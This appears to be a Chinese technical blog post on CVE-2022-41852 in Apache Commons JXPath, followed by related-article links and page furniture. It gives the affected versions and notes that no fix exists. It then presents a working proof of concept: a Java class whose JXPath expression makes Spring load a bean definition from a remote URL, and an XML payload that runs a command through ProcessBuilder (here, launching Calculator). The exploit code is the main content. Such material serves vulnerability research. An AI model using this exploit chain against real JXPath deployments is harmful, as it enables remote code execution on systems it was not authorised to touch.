Apache Commons Jxpath命令执行漏洞CVE-2022-41852

最新推荐文章于 2024-08-07 09:16:49 发布
最新推荐文章于 2024-08-07 09:16:49 发布
阅读量1.9k 收藏
点赞数
分类专栏: 安全 文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/127680672
版权

JXPath 为使用 XPath 语法遍历 JavaBeans、DOM 和其他类型的对象的图形提供了 API

受影响的版本

commons-jxpath:commons-jxpath [0, 1.3]

修复方案

该组件已停止维护,未修复

依赖包

<dependency>
  <groupId>commons-jxpath</groupId>
  <artifactId>commons-jxpath</artifactId>
  <version>1.3</version>
</dependency>

poc

需要在spring环境下运行

package com.payload.desc;

import org.apache.commons.jxpath.JXPathContext;

public class CommonsJXpathPoc {
    public static class Person {
        String name;
        String website;
    }

    /**
     * Hardcoded person object for PoC
     */
    private static final Person person = new Person();

    public static void main(String[] args) {
        JXPathContext context = JXPathContext.newContext(person);
        Object result = context.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:51212/payload.xml\")");
    }
}

xml payload

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="commandRunner" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>open</value>
                <value><![CDATA[/System/Applications/Calculator.app]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>
5wimming
关注
专栏目录
Atlassian Confluence CVE-2022-26134 RCE漏洞
sxr__nc的博客
04-22 1105
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
Apache Commons JXPath 快速入门教程
最新发布
gitblog_00966的博客
08-07 383
Apache Commons JXPath 快速入门教程 commons-jxpathApache Commons JXPath项目地址:https://gitcode.com/gh_mirrors/co/commons-jxpath Apache Commons JXPath 是一个用于在各种对象图上执行XPath表达式的库。它适用于处理JavaBean、Map、Servlet上下文以及DOM...
A Remote Code Execution in JXPath Library (CVE-2022-41852)
m0_65876116的博客
10-29 172
critical vulnerability with the identifier CVE-2022-41852. This vulnerability affects a Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability.
『Java CVECVE-2022-41852: Apache Commons JXpath RCE
Ho1aAs‘s Blog
10-13 2354
影响版本 Apache Commons JXpath
CVE-2022-41852漏洞复现
Sleeping_T的博客
02-26 1089
CVE-2022-41852复现
漏洞预警|Apache Commons JXPath 存在代码执行漏洞
LJQClqjc的博客
10-08 1574
近日网上有关于开源项目Apache Commons JXPath 存在代码执行漏洞,棱镜七彩威胁情报团队第一时间探测到,经分析研判,向全社会发起开源漏洞预警公告,提醒相关安全团队及时响应。
apache-commons-jxpath-1.3-20.el7.noarch (1).rpm
12-03
离线安装包,测试可用
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞分析
Jinmindong
01-31 759
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Apache Common JXPath
ChinFeng的专栏
02-16 1959
JXPathapache公司提供的XPath的java实现,属于jakarta的一部分,最新的版本是1.1,JXPath的主要功能在于一组java类库来使用XPath的方式访问符合JavaBeans规范的java类、java集合(Collections)、其他具有动态属性的对象(如Map、ServletContext等),同时提供了一套扩展机制使我们可以增加对这些对象之外的其他对象模型的支持public class Person { private String name; private Str
commons-jxpath-1.3.jar.zip
07-21
commons-jxpath-1.3.jar.zip
apache-commons源代码、api、jar包
03-07
里面包含所有apache-commons的jar包、源代码、还有api,是应用学习的最好选择
使用Commons JXPath简化XML/JSON处理
宋小黑的博客
12-29 1464
讲真,JXPath在很多人眼里可能还是个陌生的名字。但别担心,小黑来给咱们科普一下。Apache Commons JXPath是一个开源的Java库,它提供了一种非常直观的方式来查询和操作XML和JSON数据。其实,JXPath的原理有点像XPath,它允许咱们通过路径表达式来定位数据。这样一来,无论数据结构有多复杂,咱们都能轻松地找到需要的信息。用JXPath处理数据的好处是显而易见的。首先,它能大大简化代码。想想看,如果不用写一堆循环和条件判断,直接一行代码就能拿到数据,是不是感觉很爽?
Jakarta-Common-JXPath使用笔记
【昆山人在上海】
01-24 1569
JXPathapache公司提供的XPath的java实现,属于jakarta的一部分,最新的版本是1.1,JXPath的主要功能在于一组java类库来使用XPath的方式访问符合JavaBeans规范的java类、java集合(Collections)、其他具有动态属性的对象(如Map、ServletContext等),同时提供了一套扩展机制使我们可以增加对这些对象之外的其他对象模型的支持。 
Apache Commons JXPath 使用教程
gitblog_00465的博客
08-07 344
Apache Commons JXPath 使用教程 commons-jxpathApache Commons JXPath项目地址:https://gitcode.com/gh_mirrors/co/commons-jxpath 项目介绍 Apache Commons JXPath 是一个开源的 Java 库,它提供了一种简单的方式来使用 XPath 表达式来访问和操作各种类型的对象图,包括 ...
Apache Commons JXPath:强大的Java XPath实现
gitblog_00084的博客
08-06 458
Apache Commons JXPath:强大的Java XPath实现 commons-jxpathApache Commons JXPath项目地址:https://gitcode.com/gh_mirrors/co/commons-jxpath 项目介绍 Apache Commons JXPath 是一个基于Java的XPath 1.0实现,它不仅适用于XML处理,还能够检查和修改Jav...
jxpath
兼融并蓄,共存共荣.
06-26 2512
中国  |  热线电话:800-810-3786 如何购买  |  My Sun  |  各地网站                   首页 >> 网友原创文章 使用JXPath访问java对象、集合和XML文件 作者:肖菁 作者简介 肖菁,软件工程师,IBM developerWorks/Bea dev2dev/sun 技术开发者供稿人,主要研究J2EE、web services以及他们在web
commons(五)学习Betwixt,Digester,Jelly,和JXPath
jc_dreaming2的博客
04-15 339
XML类包含了与Java、XML技术相关的类,包括:Betwixt,Digester,Jelly,和JXPath。   2.1 Betwixt   ■ 概况:实现XML和JavaBean的映射。   ■ 官方资源:主页,二进制,源代码。   ■ 何时适用:当你想要以灵活的方式实现XML和Bean的映射,需要一个数据绑定框架之时。   ■示例应用:Betwix...
Apache Commons-HTTPClient组件详解与应用
要使用Apache Commons-HTTPClient,首先需要下载其核心库文件`commons-httpclient-3.1.jar`。这个库文件可以从Apache的官方网站获取。在实际项目中,可能还需要依赖其他Apache Commons库,例如`commons-logging.jar`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值